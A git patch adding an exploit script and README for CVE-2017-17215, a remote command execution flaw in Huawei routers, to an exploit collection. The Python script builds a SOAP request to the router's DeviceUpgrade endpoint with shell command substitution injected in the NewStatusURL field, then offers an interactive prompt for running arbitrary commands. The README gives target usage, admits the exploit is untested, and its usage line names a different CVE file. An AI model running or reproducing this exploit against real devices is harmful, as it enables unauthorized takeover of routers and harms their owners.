From c883f7fde867d56fc4e128fbcdecb352fb29db12 Mon Sep 17 00:00:00 2001
From: Mr5m1th <624995173@qq.com>
Date: Mon, 25 Dec 2017 23:40:00 +0800
Subject: [PATCH] =?UTF-8?q?=E5=8D=8E=E4=B8=BA=E8=B7=AF=E7=94=B1=E5=99=A8RC?=
 =?UTF-8?q?E?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 CVE_EXP/CVE-2017-17215/CVE-2017-17215.py | 44 ++++++++++++++++++++++++
 CVE_EXP/CVE-2017-17215/README.md         |  4 +++
 2 files changed, 48 insertions(+)
 create mode 100644 CVE_EXP/CVE-2017-17215/CVE-2017-17215.py
 create mode 100644 CVE_EXP/CVE-2017-17215/README.md

diff --git a/CVE_EXP/CVE-2017-17215/CVE-2017-17215.py b/CVE_EXP/CVE-2017-17215/CVE-2017-17215.py
new file mode 100644
index 0000000..a75e338
--- /dev/null
+++ b/CVE_EXP/CVE-2017-17215/CVE-2017-17215.py
@@ -0,0 +1,44 @@
+import requests
+import sys
+
+url_in = sys.argv[1]
+payload_url = url_in + "/ctrlt/DeviceUpgrade_1"
+payload_header = {'content-type': 'text/xml'}
+
+
+def payload_command (command_in):
+    html_escape_table = {
+        "&": "&amp;",
+        '"': "&quot;",
+        "'": "&apos;",
+        ">": "&gt;",
+        "<": "&lt;",
+    }
+    command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
+    payload_1 = "<?xml version = \"1.0\" ?>" \
+                "   <s:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"http://appleworld.com/api/schema\">" \
+                "       <s:Body>"\
+                "           <u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">"\
+                "               <NewStatusURL> $("+command_filtered+" > /tmp/1337g) </NewStatusURL>"\
+                "               <NewDownloadURL> $(cat /tmp/1337g) </NewDownloadURL>"\
+                "           </u:Upgrade>"\
+                "       </s:Body>" \
+                "    </s:Envelope>"
+    return payload_1
+
+def do_post(command_in):
+    result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
+    print result.content
+
+
+
+
+print "***************************************************** \n" \
+       "****************   Coded By 1337g  ****************** \n" \
+       "*      CVE-2017-17215 Remote Command Execute EXP    * \n" \
+       "***************************************************** \n"
+
+while 1:
+    command_in = raw_input("Eneter your command here: ")
+    if command_in == "exit" : exit(0)
+    do_post(command_in)
diff --git a/CVE_EXP/CVE-2017-17215/README.md b/CVE_EXP/CVE-2017-17215/README.md
new file mode 100644
index 0000000..6b618c1
--- /dev/null
+++ b/CVE_EXP/CVE-2017-17215/README.md
@@ -0,0 +1,4 @@
+# CVE-2017-17215
+Usage: CVE-2017-12149.py http://targetip:37215/  
+I am so poor that cant afford to but a HUAWEI router XD so it is not tested on any machine~  
+but the exp technically should be working